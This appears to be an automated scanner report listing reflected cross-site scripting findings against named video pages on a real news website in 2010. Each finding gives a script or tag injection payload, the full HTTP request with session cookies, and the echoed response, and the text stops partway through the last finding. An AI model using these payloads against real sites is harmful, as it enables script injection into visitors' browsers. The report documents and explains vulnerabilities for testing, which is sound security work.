HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29424 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:39 GMT Date: Mon, 22 Nov 2010 00:35:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video708ad"><a>a30d5c2b6ec ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 68867--><script>alert(1)</script>8206853922a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video68867--><script>alert(1)</script>8206853922a/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29463 Vary: Accept-Encoding Cache-Control: max-age=277 Expires: Mon, 22 Nov 2010 00:40:56 GMT Date: Mon, 22 Nov 2010 00:36:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video68867--><script>alert(1)</script>8206853922a/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d521e"><a>966c2b1aee3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosd521e"><a>966c2b1aee3/latest/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:41:20 GMT Date: Mon, 22 Nov 2010 00:36:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosd521e"><a>966c2b1aee3 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54ad4"-alert(1)-"dde8174050c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos54ad4"-alert(1)-"dde8174050c/latest/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:50 GMT Date: Mon, 22 Nov 2010 00:37:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6cb4"-alert(1)-"2f4df01e458 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestb6cb4"-alert(1)-"2f4df01e458/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:43:47 GMT Date: Mon, 22 Nov 2010 00:38:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106804
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fd3"><a>5c96c58a517 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest41fd3"><a>5c96c58a517/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:42:44 GMT Date: Mon, 22 Nov 2010 00:38:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106699
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest41fd3"><a>5c96c58a517"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5784"-alert(1)-"7836b725487 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633d5784"-alert(1)-"7836b725487/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:44:04 GMT Date: Mon, 22 Nov 2010 00:39:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55dbc"-alert(1)-"be83cf07536 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/make-drones-almost-invincible55dbc"-alert(1)-"be83cf07536/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:38 GMT Date: Mon, 22 Nov 2010 00:39:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106685
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1228f"-alert(1)-"0a46e08cda4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/make-drones-almost-invincible/6607045410011228f"-alert(1)-"0a46e08cda4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:44:32 GMT Date: Mon, 22 Nov 2010 00:39:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4baf3"><a>7998fcdbb93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video4baf3"><a>7998fcdbb93/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29453 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:14 GMT Date: Mon, 22 Nov 2010 00:40:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video4baf3"><a>7998fcdbb93 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload d8699--><script>alert(1)</script>a361df0d06f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videod8699--><script>alert(1)</script>a361df0d06f/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29492 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:20 GMT Date: Mon, 22 Nov 2010 00:41:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videod8699--><script>alert(1)</script>a361df0d06f/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e455"-alert(1)-"6ef62eb7367 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos6e455"-alert(1)-"6ef62eb7367/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:47:27 GMT Date: Mon, 22 Nov 2010 00:42:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9840b"><a>577d7885e1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos9840b"><a>577d7885e1b/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:45:59 GMT Date: Mon, 22 Nov 2010 00:41:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106728
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos9840b"><a>577d7885e1b c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30bb5"-alert(1)-"69a02b42d6f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest30bb5"-alert(1)-"69a02b42d6f/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:48:44 GMT Date: Mon, 22 Nov 2010 00:43:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106742
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... /javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec3d7"><a>5e95bf70531 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestec3d7"><a>5e95bf70531/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:46 GMT Date: Mon, 22 Nov 2010 00:42:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestec3d7"><a>5e95bf70531"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1898"-alert(1)-"2edd90105c3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633d1898"-alert(1)-"2edd90105c3/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:02 GMT Date: Mon, 22 Nov 2010 00:44:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... /javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 940f6"-alert(1)-"b91cf5f1eb9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/making-the-soundtrack-harry-potter-and-the-deathly-hallows940f6"-alert(1)-"b91cf5f1eb9/653378922001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:48:59 GMT Date: Mon, 22 Nov 2010 00:44:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 878e5"-alert(1)-"ee44701c9fe was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
